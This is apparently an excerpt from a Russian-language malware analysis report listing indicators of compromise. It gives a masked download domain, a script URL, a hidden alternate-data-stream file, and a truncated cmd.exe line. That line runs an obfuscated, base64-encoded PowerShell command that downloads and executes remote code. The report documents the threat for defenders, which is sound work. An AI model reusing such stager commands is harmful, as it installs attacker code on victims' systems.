Техническая информация
- http://so######idancesystem.com/en/aguu.ps1
- %TEMP%\icon.txt:icon.png
- 'so######idancesystem.com':80
- DNS ASK so######idancesystem.com
- '<SYSTEM32>\cmd.exe' /c ECHo POweRSHeLL.eXE -Ex bYPAss -Nop -W 1 -Ec aQBlAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBDAFQAIAAgAE4AZQBUAC4AdwBlAEIAQwBsAGkARQBOAFQAKQAuAGQAbwB3AE4ATABPAGEARABzAFQAUgBpAE4ARwAoACcAaAB0AHQAcAA6AC...
- '<SYSTEM32>\cmd.exe' -